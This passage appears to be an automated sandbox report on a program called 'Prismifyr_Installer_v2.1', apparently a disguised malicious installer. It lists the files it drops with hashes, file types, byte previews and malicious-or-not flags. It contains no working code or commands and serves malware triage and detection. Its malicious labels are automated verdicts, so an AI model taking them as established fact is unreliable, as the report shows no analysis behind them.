                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe
                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                        Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                        MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                        SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                        SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                        SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe
                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):196608
                                                                                                                                                                                                                        Entropy (8bit):1.1239949490932863
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                                                                                                                        MD5:271D5F995996735B01672CF227C81C17
                                                                                                                                                                                                                        SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                                                                                                                        SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                                                                                                                        SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe
                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):155648
                                                                                                                                                                                                                        Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                        MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                        SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                        SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                        SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe
                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):51200
                                                                                                                                                                                                                        Entropy (8bit):0.8745947603342119
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                                                                                                                                                        MD5:378391FDB591852E472D99DC4BF837DA
                                                                                                                                                                                                                        SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                                                                                                                                                        SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                                                                                                                                                        SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe
                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):196608
                                                                                                                                                                                                                        Entropy (8bit):1.1239949490932863
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                                                                                                                        MD5:271D5F995996735B01672CF227C81C17
                                                                                                                                                                                                                        SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                                                                                                                        SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                                                                                                                        SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1148
                                                                                                                                                                                                                        Entropy (8bit):5.327864461742126
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:3ZCl1SKco4KmZjKbm51s4RPT6moUe7u1o+m9qr9t7J0gt/NKIl9r8Hq:Yl1SU4xymI4RfoUeCa+m9qr9tK8NDd
                                                                                                                                                                                                                        MD5:2A5D755522253DD41D4AC6EA880ECB61
                                                                                                                                                                                                                        SHA1:86EFAB962AC00866CDC8FE8FD9DC71E3D8DD2DC8
                                                                                                                                                                                                                        SHA-256:109CD73CF623F351604DC72827AF712804938F2E61DCE87160059FD802D295D8
                                                                                                                                                                                                                        SHA-512:6A19C8CE27DA4B02D5615C0A75B538301CA4F4D44E268541F7805648184BC47D6A038EBC2B50AE0886A6806DCD232BD3C6F2F5A1190F94234C3C85E262789A77
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:@...e................................................@..........8...................=.@G..?...o.........System.Security.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...D.......
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1096
                                                                                                                                                                                                                        Entropy (8bit):5.13006727705212
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:36DiJHxRHuyPP3GtIHw1Gg9QH+sUW8Ok4F+d1o36qjFD:36DiJzfPvGt7ICQH+sfIte36AFD
                                                                                                                                                                                                                        MD5:4D42118D35941E0F664DDDBD83F633C5
                                                                                                                                                                                                                        SHA1:2B21EC5F20FE961D15F2B58EFB1368E66D202E5C
                                                                                                                                                                                                                        SHA-256:5154E165BD6C2CC0CFBCD8916498C7ABAB0497923BAFCD5CB07673FE8480087D
                                                                                                                                                                                                                        SHA-512:3FFBBA2E4CD689F362378F6B0F6060571F57E228D3755BDD308283BE6CBBEF8C2E84BEB5FCF73E0C3C81CD944D01EE3FCF141733C4D8B3B0162E543E0B9F3E63
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:Copyright (c) Electron contributors.Copyright (c) 2013-2020 GitHub Inc...Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the."Software"), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND.NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE.LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION.OF CONTRACT, TORT OR OTHERWISE, ARISIN
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:HTML document, ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):9431332
                                                                                                                                                                                                                        Entropy (8bit):4.776029024260704
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:G8QQf6Ox6j1newR6Xe1VmfQ6k6T6W6r656+eGj7dOp+:fGyeGd
                                                                                                                                                                                                                        MD5:C5DE877A372447FDD303C1026FB432F2
                                                                                                                                                                                                                        SHA1:6FC0A751EDACBE061E97248FA550691225891030
                                                                                                                                                                                                                        SHA-256:4BF4DD1A05ECBA975C90D85117DEA74B0E94114F882BB26A7E7D1029AFE8FDA8
                                                                                                                                                                                                                        SHA-512:B3079B18419CA854118E12E8D4681C9E66AE55FBB1F69CFB3EF6322A1C17557C0ADBFAB5CED030133AF814D39483A2B5C7090CA3ABB545E8808FFB6ABE6B3AE6
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: Generated by licenses.py; do not edit. --><!doctype html>.<html>.<head>.<meta charset="utf-8">.<meta name="viewport" content="width=device-width">.<meta name="color-scheme" content="light dark">.<title>Credits</title>.<link rel="stylesheet" href="chrome://resources/css/text_defaults.css">.<link rel="stylesheet" href="chrome://credits/credits.css">.</head>.<body>.<span class="page-title">Credits</span>.<a id="print-link" href="#" hidden>Print</a>.<label class="show show-all" tabindex="0">.<input type="checkbox" hidden>.</label>.<div class="open-sourced">. Chromium software is made available as source code. <a href="https://source.chromium.org/chromium">here</a>..</div>..<div style="clear:both; overflow:auto;"> Chromium <3s the following projects -->.<div class="product">.<span class="title">2-dim General Purpose FFT (Fast Fourier/Cosine/Sine Transform) Package</span>.<span class="homepage"><a href="http://www.kurims.kyoto-u.ac.jp/~ooura/fft.html">homepage</a></span>.<labe
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):186389504
                                                                                                                                                                                                                        Entropy (8bit):6.755948449281348
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1572864:AafJfQkKEVr6FTkCbxqd6PgLAAez2YCSXczL2UG4kbffUgAPqpL44fQ4lTX3omTB:D5kbdbB39f
                                                                                                                                                                                                                        MD5:F90856B824B429A51D390C25F21C9683
                                                                                                                                                                                                                        SHA1:D0EDD6E25D5C7B50C320794C956AE63A0012620A
                                                                                                                                                                                                                        SHA-256:147327A853ADCEDDCF49A5CF07E7A727E87798F399E3AF5680909B640DE4DBE4
                                                                                                                                                                                                                        SHA-512:B51B39808E961EAC513CD42E3B5030F0BF3268DC91DE4B3CC17B8B7C1C38B214935783E02204EE3F5BAECA0037B16BC23DC26DDDB6D9F9B3A970DE092D6415F4
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......f.........."......f%......... C~........@............................. [...........`......................................... ........;..h.....H..........%I...........K.$&..............................(.....%.@...........0R.......b.......................text....e%......f%................. ..`.rdata........%......l%.............@..@.data.....H..0...>..................@....pdata...%I......&I..P..............@..@.gxfg....B....H..D...v..............@..@.retplne.....PH..........................rodata......`H..................... ..`.tls..........H.....................@...CPADinfo8.....H.....................@...LZMADEC.......H..................... ..`_RDATA........H.....................@..@malloc_h......H..................... ..`prot..........H.....................@..@.rsrc.........H.....................@..@.reloc..$&....K..(..................@..B................
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):151326
                                                                                                                                                                                                                        Entropy (8bit):7.91733776058705
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:Mz8JCGIdkwTPa/XKjKkxP1L2o418Gb0+VRLf0ld0GY3cQ3ERVm2I:Mz81Idk8a4Kkx5K18Gb0OV8ld0GecQ35
                                                                                                                                                                                                                        MD5:3C72D78266A90ED10DC0B0DA7FDC6790
                                                                                                                                                                                                                        SHA1:6690EB15B179C8790E13956527EBBF3D274EEF9B
                                                                                                                                                                                                                        SHA-256:14A6A393C60F62DF9BC1036E98346CD557E0AE73E8C7552D163FA64DA77804D7
                                                                                                                                                                                                                        SHA-512:B1BABF1C37B566A5F0E5F84156F7AB59872690BA0BDD51850525F86769BFEBC245F83988A3508945CF7617D73CD25E8469228974DD2C38415388B6A378552420
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:..........<.....................V...........C.......................4...........i.....9......!.....%....:'.....1.....<....f?.....C.....G.....I.....J.....M.....O.....R....vV.....Z.....]....H`.....a....-c....Td.....f..%..f..&..l..(.Dr..+..v..3..y..4..}..=.....>.....?.3...A.....E.....F.....I....J.%...K....L.....V.....W.u...X.....Y.=....+....L.................. ....1........".....#.....$.....%.....&.....'.....,.,...-........ ....#....%.........0.....3...."9....2D.....E.....N.....T....QZ...._....f....Mh.....l....p....Ez....e}..............A.....y..........G................x....................................k.....B..........F...........X..........!...!.O...".....$.B...%....*.B...,.....-.........F.....G....H.b...I.....J.h...K.=...L.....M.....N.....O....P.....Q.n...R.....S....T....U....V.....W.|...Y.@!..Z.."..[.."..\.#..].e$..^..%.._..%..`..'..a..(..b..)..e..,.....1...."2....y2.....2....n3....4....e5....5.....6....U6....6.....6.....<.....@....bA.....A
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):228242
                                                                                                                                                                                                                        Entropy (8bit):7.947127774301086
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:HDQYajN6svyABnI86uKkxugx5GMRejnbdZnVE6YoppO4:sfjN6svyABTKkxa6edhVELoXO4
                                                                                                                                                                                                                        MD5:3969308AAE1DC1C2105BBD25901BCD01
                                                                                                                                                                                                                        SHA1:A32F3C8341944DA75E3EED5EF30602A98EC75B48
                                                                                                                                                                                                                        SHA-256:20C93F2CFD69F3249CDFD46F317B37A9432ECC0DE73323D24ECF65CE0F3C1BB6
                                                                                                                                                                                                                        SHA-512:F81ED1890B46F7D9F6096B9EF5DAAB5B21788952EFB5C4DCD6B8FD43E4673A91607C748F31434C84A180D943928D83928037058493E7E9B48C3DE1FC8025DF7F
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:..........<......... .........................................v%.....*.....-....25.....:.....>....=G.....K....._....Yt....uy.....................g........................................|...........b...........6...%.....&.z...(.J...+.....3.....4.....=.r...>."...?.....A.....E.....F..#..I.c+..J..7..K..?..L..F..V..J..W.~M..X..R..Y.nS....T....X....[....^...a....d....i....l.."..p..#..r..$..s..%..t..&..u..'..v..,.,w..-..................".....d.....m........................................X................x...... .....#....-.....0....#9.....=.....F.....Q....KU.....V....._....Kh.....j....>m....Kq....`x....xy.........`...............^.....\.....I.....j.....[........!...."....$....%.S...*....,.....-..........F....G.....H.....I.....J....K.:...L.....M.-...N.....O.|...P.....Q....R....S.f...T.G...U._ ..V.e&..W..,..Y..1..Z.J3..[.@4..\.c5..].6..^.7.._.8..`.p:..a.$<..b..=..e.J....Z.....Z....G[....[....T\....]....c^....^....._....w_....._.....`....?f....5j.....j....Mk
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):4916728
                                                                                                                                                                                                                        Entropy (8bit):6.398031738914566
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:hCZnRO4XyM53Rkq4ypQqdoRpmruVNYvkaRwvdiD0N+YEzI4og/RfzHLeHTRhFRN1:oG2QCwmHjnog/pzHAo/Ayc
                                                                                                                                                                                                                        MD5:A7B7470C347F84365FFE1B2072B4F95C
                                                                                                                                                                                                                        SHA1:57A96F6FB326BA65B7F7016242132B3F9464C7A3
                                                                                                                                                                                                                        SHA-256:AF7B99BE1B8770C0E4D18E43B04E81D11BDEB667FA6B07ADE7A88F4C5676BF9A
                                                                                                                                                                                                                        SHA-512:83391A219631F750499FD9642D59EC80FB377C378997B302D10762E83325551BB97C1086B181FFF0521B1CA933E518EAB71A44A3578A23691F215EBB1DCE463D
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                                        • Filename: svchost.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: JaborSetup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: ArenaWarsSetup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: ArenaWarsSetup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: DungeOfDestiny Setup 1.0.0.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: Game.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: bot_library.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: svAsYrT598.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: kc8qrDHj1V.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: Solicitud de Cotizaci#U00f3n #U2013 Cat#U00e1logo de Muestras2024.vbs, Detection: malicious, Browse
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........|3..]...]...]..e\...]...\.5.]..e...]..wX...]..wY...]..e^...]..eX.y.]..eY...]..e]...]..eU./.]..e....]..e_...].Rich..].................PE..d.....Ne.........." ......8..........<).......................................K......JK...`A........................................`%G.x....(G.P.....J.@.....H.......J..%....J.....p.D.p....................S<.(...pR<.@............S<.(............................text.....8.......8................. ..`.rdata...F....8..P....8.............@..@.data...`....@G......@G.............@....pdata........H......@H.............@..@.rsrc...@.....J......@J.............@..@.reloc........J......PJ.............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2924544
                                                                                                                                                                                                                        Entropy (8bit):6.704464688156766
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:2kzMF+in6Rjp84IEeOUmlyNTzk74y0V+X6CfTBPwN/4MT+fc0:2kXpCOUyy5Z96Q/Wk
                                                                                                                                                                                                                        MD5:070710A53A0F388A2967D6084228DB12
                                                                                                                                                                                                                        SHA1:34E72D2AEFD79AEE42BF85D6AAFF35B82AB1EF65
                                                                                                                                                                                                                        SHA-256:4813EFA3758EE8AAC161FE00806F9EC4B65E31886FFA2075115D4986F9D05205
                                                                                                                                                                                                                        SHA-512:12558C42135CDF3BDF5A24DA235C48DA5A28789C90CDEBF85FEA5746BA18BBD4428F9A8F0A47876D2ACF4E22EEB04AEA96A0317F8480082073D42FAAD8306952
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......f.........." ......#..........k........................................:...........`A........................................0.*.......*.(............p9..............:.@5..,.*.......................*.(.....$.@...........x.*.8............................text.....#.......#................. ..`.rdata..D.....$.......#.............@..@.data.........+.."...p+.............@....pdata......p9.......+.............@..@.gxfg....+... :..,...8,.............@..@.retplne.....P:......d,..................tls.........`:......f,.............@..._RDATA.......p:......h,.............@..@.reloc..@5....:..6...j,.............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):10468208
                                                                                                                                                                                                                        Entropy (8bit):6.265606239082294
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:196608:+SPBhORiYAXHiXUxY/iJ53IWhlVjEeIu2Y6U:++wkpHiXUxY/iJ53IWhlVjEeIZU
                                                                                                                                                                                                                        MD5:FFD67C1E24CB35DC109A24024B1BA7EC
                                                                                                                                                                                                                        SHA1:99F545BC396878C7A53E98A79017D9531AF7C1F5
                                                                                                                                                                                                                        SHA-256:9AE98C06CBB0EA43C5CD6B5725310C008C65E46072421A1118CB88E1DE9A8B92
                                                                                                                                                                                                                        SHA-512:E1A865E685D2D3BACD0916D4238A79462519D887FEB273A251120BB6AF2B4481D025F3B21CE9A1A95A49371A0AA3ECF072175BA756974E831DBFDE1F0FEAEB79
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:...'........CmnD........ Copyright (C) 2016 and later: Unicode, Inc. and others. License & terms of use: http://www.unicode.org/copyright.html ......E.......E...(...E...)...F...).."F...1..5F..`1..EF...N..XF..PN..hF...N..xF.......F.......F.......F..@....F.......F......F..0....F.......G......$G......7G......JG......]G..@...pG.......G.......G..@....G.......G.......G..@....G.......G..p....H..`....H.......H..@...AH......TH..p...gH.....zH.......H..`....H.......H.......H..P....H.......H......H..`....I......%I..P...:I......RI.....bI..@...uI.......I.......I.......I..P....I.......I.......I..0....I.......J... ...J.. !..-J..@$..=J...$..PJ...$..qJ.......J...<...J....&..J....&..J.. .&..J....&..K..`.&..K....&.3K....&.JK..0.&.aK....'.xK....'..K....'..K...(..K....(..K...O)..K....)..L..0Q*.>L..`.*.gL..Pi+..L....+..L...i,..L....,..L..P}-..M..@.-.,M.. .-.EM....-.\M....-.uM....-..M...$...M..0%...M....0..M...j0..M..`.0..N..p.0.1N....0.AN....0.TN..@.0.iN....0..N..0.0..N....0..N....0..N....1..N....1..N..
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):484352
                                                                                                                                                                                                                        Entropy (8bit):6.370928516739512
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:teoMqSwktU6O8J6AGrIKLD0Rv8KRWAwi+u7fSGSQtZu:ZMeAQ8JFGrIKLDW9W2+u7fSGSb
                                                                                                                                                                                                                        MD5:0109839C82BFB399D68D906DEF2E3618
                                                                                                                                                                                                                        SHA1:11879DA345C681DB933A893954A08F8DF6923636
                                                                                                                                                                                                                        SHA-256:1393633DCCB633E44F717A3737E4B88315662856916FE534B5F9017E15464074
                                                                                                                                                                                                                        SHA-512:B25AD5F24E20654622C53CE89D6AFF0678179F823CB446110AB64ECCA8E2688D5E98582985699D82C473D87F31AD12398DDFE6911B970021C96EBC587F8A06B3
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......f.........." .....L................................................................`A.........................................L.......[..(.......x....0...?..............<....D.......................C..(....`..@............^...............................text...:K.......L.................. ..`.rdata...q...`...r...P..............@..@.data....K....... ..................@....pdata...?...0...@..................@..@.gxfg... &...p...(..."..............@..@.retplne.............J...................tls....!............L..............@..._RDATA...............N..............@..@.rsrc...x............P..............@..@.reloc..<............V..............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):8364544
                                                                                                                                                                                                                        Entropy (8bit):6.49454047094872
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:98304:5sbPUQUHoQ5dKV0H4HrX7OBAK2dMNFR7VxVXC3OTv+:5sbP/UHoQ5AV++wAlMlVXmOK
                                                                                                                                                                                                                        MD5:EBFBBD4F4887CADD1C135F4CA714E00F
                                                                                                                                                                                                                        SHA1:C37FC4A0F627D5346561EB29C556A54A050C8D95
                                                                                                                                                                                                                        SHA-256:FCE6894831D945EC7CA141290DD5B57375D83621B8EDF13BA02B14CADCEE6C29
                                                                                                                                                                                                                        SHA-512:EC15F8700330994B95C7F0961ECCBB8CD8401AF3051448375347A2E75352F1D9034A1C68E5B9AAB887D07360E38FC301F256B466DCC83377451F171320440B13
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......f.........." ......c...........T...................................................`A........................................].w.......w.d.............|.\J...................v.......................v.(.....c.@.............x.......w.@....................text.....c.......c................. ..`.rdata........c.......c.............@..@.data.........x.......x.............@....pdata..\J....|..L...F|.............@..@.gxfg....-...@........~.............@..@.retplne.....p........~..................tls....B.............~.............@..._RDATA................~.............@..@.rsrc.................~.............@..@.reloc................~.............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):140288
                                                                                                                                                                                                                        Entropy (8bit):6.055411992765344
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:94PTD6FEzMju6bzJKjpEPeTOKvJhEnww+YbRYvPuq:94jQju6b9KilKvJurR8W
                                                                                                                                                                                                                        MD5:04BFBFEC8DB966420FE4C7B85EBB506A
